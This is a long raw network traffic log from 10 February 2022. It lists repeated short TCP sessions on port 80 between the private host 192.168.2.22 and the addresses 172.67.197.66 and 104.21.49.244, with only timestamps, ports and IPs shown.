                        Feb 10, 2022 10:22:17.238154888 CET8049180172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:17.238274097 CET4918080192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:17.254414082 CET8049180172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:17.311069012 CET8049180172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:17.311122894 CET8049180172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:17.311192036 CET4918080192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:17.311235905 CET4918080192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:17.329090118 CET8049180172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:18.565761089 CET4918180192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:18.581887960 CET8049181172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:18.581958055 CET4918180192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:18.584774971 CET4918180192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:18.601072073 CET8049181172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:18.601130009 CET4918180192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:18.617206097 CET8049181172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:18.688278913 CET8049181172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:18.688307047 CET8049181172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:18.688405991 CET4918180192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:18.688481092 CET4918180192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:18.704574108 CET8049181172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:20.284409046 CET4918280192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:20.300811052 CET8049182172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:20.300918102 CET4918280192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:20.304832935 CET4918280192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:20.321053982 CET8049182172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:20.321175098 CET4918280192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:20.337419987 CET8049182172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:20.398272991 CET8049182172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:20.398478031 CET4918280192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:20.398603916 CET8049182172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:20.398686886 CET4918280192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:20.414920092 CET8049182172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:21.351104021 CET4918380192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:21.367405891 CET8049183172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:21.367580891 CET4918380192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:21.371169090 CET4918380192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:21.387438059 CET8049183172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:21.387509108 CET4918380192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:21.403589010 CET8049183172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:21.466526985 CET8049183172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:21.466562986 CET8049183172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:21.466687918 CET4918380192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:21.466763973 CET4918380192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:21.482923031 CET8049183172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:22.470705986 CET4918480192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:22.487014055 CET8049184172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:22.487095118 CET4918480192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:22.490195036 CET4918480192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:22.506412983 CET8049184172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:22.506509066 CET4918480192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:22.522639990 CET8049184172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:22.588881016 CET8049184172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:22.588993073 CET4918480192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:22.589006901 CET8049184172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:22.589051008 CET4918480192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:22.605144024 CET8049184172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:23.485663891 CET4918580192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:23.501909971 CET8049185104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:23.501980066 CET4918580192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:23.504559040 CET4918580192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:23.520663977 CET8049185104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:23.520739079 CET4918580192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:23.536732912 CET8049185104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:23.595321894 CET8049185104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:23.595362902 CET8049185104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:23.595412016 CET4918580192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:23.595448971 CET4918580192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:23.611484051 CET8049185104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:24.569221020 CET4918680192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:24.585460901 CET8049186104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:24.585552931 CET4918680192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:24.588293076 CET4918680192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:24.604443073 CET8049186104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:24.604518890 CET4918680192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:24.620671988 CET8049186104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:24.674747944 CET8049186104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:24.674777985 CET8049186104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:24.674889088 CET4918680192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:24.674928904 CET4918680192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:24.693778992 CET8049186104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:25.573754072 CET4918780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:25.589977980 CET8049187172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:25.590065002 CET4918780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:25.593017101 CET4918780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:25.609158993 CET8049187172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:25.609266043 CET4918780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:25.625433922 CET8049187172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:25.698025942 CET8049187172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:25.698052883 CET8049187172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:25.698188066 CET4918780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:25.698234081 CET4918780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:25.714674950 CET8049187172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:26.652168989 CET4918880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:26.668577909 CET8049188172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:26.668679953 CET4918880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:26.671474934 CET4918880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:26.687669039 CET8049188172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:26.687769890 CET4918880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:26.704175949 CET8049188172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:26.773804903 CET8049188172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:26.773830891 CET8049188172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:26.773989916 CET4918880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:26.774048090 CET4918880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:26.793953896 CET8049188172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:27.668476105 CET4918980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:27.684725046 CET8049189172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:27.684824944 CET4918980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:27.690156937 CET4918980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:27.706406116 CET8049189172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:27.707482100 CET4918980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:27.723751068 CET8049189172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:27.795358896 CET8049189172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:27.795473099 CET4918980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:27.795651913 CET8049189172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:27.795697927 CET4918980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:27.811539888 CET8049189172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:29.066272020 CET4919080192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:29.082537889 CET8049190172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:29.082719088 CET4919080192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:29.085941076 CET4919080192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:29.102055073 CET8049190172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:29.102108955 CET4919080192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:29.118212938 CET8049190172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:29.188222885 CET8049190172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:29.188270092 CET8049190172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:29.188505888 CET4919080192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:29.190248013 CET4919080192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:29.206408024 CET8049190172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:30.778287888 CET4919180192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:30.796669960 CET8049191172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:30.796747923 CET4919180192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:30.799654961 CET4919180192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:30.818279982 CET8049191172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:30.818408966 CET4919180192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:30.835285902 CET8049191172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:30.894473076 CET8049191172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:30.894598007 CET8049191172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:30.894646883 CET4919180192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:30.894673109 CET4919180192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:30.910684109 CET8049191172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:31.859989882 CET4919280192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:31.877049923 CET8049192172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:31.877183914 CET4919280192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:31.879954100 CET4919280192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:31.896163940 CET8049192172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:31.897677898 CET4919280192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:31.913887978 CET8049192172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:31.985625029 CET8049192172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:31.985702038 CET8049192172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:31.985780001 CET4919280192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:31.985806942 CET4919280192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:32.001929045 CET8049192172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:32.931972027 CET4919380192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:32.948196888 CET8049193172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:32.948293924 CET4919380192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:32.951127052 CET4919380192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:32.967236996 CET8049193172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:32.967331886 CET4919380192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:32.983419895 CET8049193172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:33.053421974 CET8049193172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:33.053452015 CET8049193172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:33.053497076 CET4919380192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:33.053560972 CET4919380192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:33.069675922 CET8049193172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:33.987154007 CET4919480192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:34.003437996 CET8049194172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:34.003516912 CET4919480192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:34.006464005 CET4919480192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:34.022649050 CET8049194172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:34.022774935 CET4919480192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:34.038912058 CET8049194172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:34.138065100 CET8049194172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:34.138206005 CET4919480192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:34.138405085 CET8049194172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:34.138474941 CET4919480192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:34.154381037 CET8049194172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:35.036499977 CET4919580192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:35.052778959 CET8049195172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:35.052934885 CET4919580192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:35.055712938 CET4919580192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:35.071971893 CET8049195172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:35.072159052 CET4919580192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:35.088356018 CET8049195172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:35.142774105 CET8049195172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:35.142816067 CET8049195172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:35.143012047 CET4919580192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:35.143054008 CET4919580192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:35.159360886 CET8049195172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:36.053227901 CET4919680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:36.069645882 CET8049196172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:36.069736958 CET4919680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:36.072597980 CET4919680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:36.088881016 CET8049196172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:36.088974953 CET4919680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:36.105379105 CET8049196172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:36.184967995 CET8049196172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:36.185009003 CET8049196172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:36.185098886 CET4919680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:36.185194016 CET4919680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:36.201515913 CET8049196172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:37.099988937 CET4919780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:37.117507935 CET8049197172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:37.117628098 CET4919780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:37.120242119 CET4919780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:37.137145042 CET8049197172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:37.137352943 CET4919780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:37.153781891 CET8049197172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:37.238821030 CET8049197172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:37.239020109 CET8049197172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:37.239078045 CET4919780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:37.239131927 CET4919780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:37.255415916 CET8049197172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:38.150326967 CET4919880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:38.166742086 CET8049198172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:38.166996956 CET4919880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:38.172976971 CET4919880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:38.189368010 CET8049198172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:38.189532995 CET4919880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:38.205826044 CET8049198172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:38.275609016 CET8049198172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:38.275681019 CET8049198172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:38.276915073 CET4919880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:38.276962996 CET4919880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:38.294013977 CET8049198172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:39.205216885 CET4919980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:39.222008944 CET8049199172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:39.222090006 CET4919980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:39.224649906 CET4919980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:39.242449999 CET8049199172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:39.242547989 CET4919980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:39.258795977 CET8049199172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:39.314145088 CET8049199172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:39.314198971 CET8049199172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:39.314305067 CET4919980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:39.314362049 CET4919980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:39.330491066 CET8049199172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:40.400808096 CET4920080192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:40.418236971 CET8049200104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:40.418353081 CET4920080192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:40.420564890 CET4920080192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:40.437799931 CET8049200104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:40.437928915 CET4920080192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:40.455904007 CET8049200104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:40.521979094 CET8049200104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:40.522002935 CET8049200104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:40.522114992 CET4920080192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:40.522222996 CET4920080192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:40.540256977 CET8049200104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:41.417762041 CET4920180192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:41.433957100 CET8049201104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:41.434063911 CET4920180192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:41.439397097 CET4920180192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:41.455579996 CET8049201104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:41.455754042 CET4920180192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:41.471977949 CET8049201104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:41.572663069 CET8049201104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:41.572717905 CET8049201104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:41.572793961 CET4920180192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:41.572855949 CET4920180192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:41.589029074 CET8049201104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:42.511383057 CET4920280192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:42.530836105 CET8049202172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:42.531002045 CET4920280192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:42.533999920 CET4920280192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:42.550182104 CET8049202172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:42.550273895 CET4920280192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:42.567421913 CET8049202172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:42.618619919 CET8049202172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:42.618782997 CET4920280192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:42.618992090 CET8049202172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:42.619057894 CET4920280192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:42.638539076 CET8049202172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:43.526220083 CET4920380192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:43.542560101 CET8049203172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:43.542653084 CET4920380192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:43.544899940 CET4920380192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:43.561163902 CET8049203172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:43.561275959 CET4920380192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:43.577434063 CET8049203172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:43.664395094 CET8049203172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:43.664583921 CET8049203172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:43.664665937 CET4920380192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:43.664695024 CET4920380192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:43.680918932 CET8049203172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:44.565237999 CET4920480192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:44.581473112 CET8049204172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:44.581579924 CET4920480192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:44.584137917 CET4920480192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:44.600348949 CET8049204172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:44.600441933 CET4920480192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:44.616890907 CET8049204172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:44.682432890 CET8049204172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:44.682534933 CET4920480192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:44.682564020 CET8049204172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:44.682605982 CET4920480192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:44.698829889 CET8049204172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:45.621344090 CET4920580192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:45.637773037 CET8049205104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:45.637868881 CET4920580192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:45.641460896 CET4920580192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:45.657774925 CET8049205104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:45.657860994 CET4920580192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:45.674139023 CET8049205104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:45.752800941 CET8049205104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:45.752876043 CET8049205104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:45.753129005 CET4920580192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:45.753156900 CET4920580192.168.2.22104.21.49.244
                        Feb 10, 2022 10:22:45.769335032 CET8049205104.21.49.244192.168.2.22
                        Feb 10, 2022 10:22:46.707736015 CET4920680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:46.724137068 CET8049206172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:46.724240065 CET4920680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:46.729665995 CET4920680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:46.745959997 CET8049206172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:46.746081114 CET4920680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:46.762279987 CET8049206172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:46.816407919 CET8049206172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:46.816448927 CET8049206172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:46.816528082 CET4920680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:46.816579103 CET4920680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:46.832793951 CET8049206172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:47.715126991 CET4920780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:47.731479883 CET8049207172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:47.731621027 CET4920780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:47.737185955 CET4920780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:47.753341913 CET8049207172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:47.753462076 CET4920780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:47.769690037 CET8049207172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:47.842878103 CET8049207172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:47.842983007 CET4920780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:47.843185902 CET8049207172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:47.843245029 CET4920780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:47.859261990 CET8049207172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:48.815722942 CET4920880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:48.831999063 CET8049208172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:48.832098961 CET4920880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:48.837397099 CET4920880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:48.853988886 CET8049208172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:48.854139090 CET4920880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:48.870383024 CET8049208172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:48.933581114 CET8049208172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:48.933629990 CET8049208172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:48.933809042 CET4920880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:48.935355902 CET4920880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:48.951661110 CET8049208172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:49.881350040 CET4920980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:49.897785902 CET8049209172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:49.897876978 CET4920980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:49.900198936 CET4920980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:49.916419983 CET8049209172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:49.916532040 CET4920980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:49.932833910 CET8049209172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:50.045497894 CET8049209172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:50.045552015 CET8049209172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:50.045622110 CET4920980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:50.045672894 CET4920980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:22:50.061939001 CET8049209172.67.197.66192.168.2.22
                        Feb 10, 2022 10:22:51.021534920 CET4921080192.168.2.22172.67.197.66
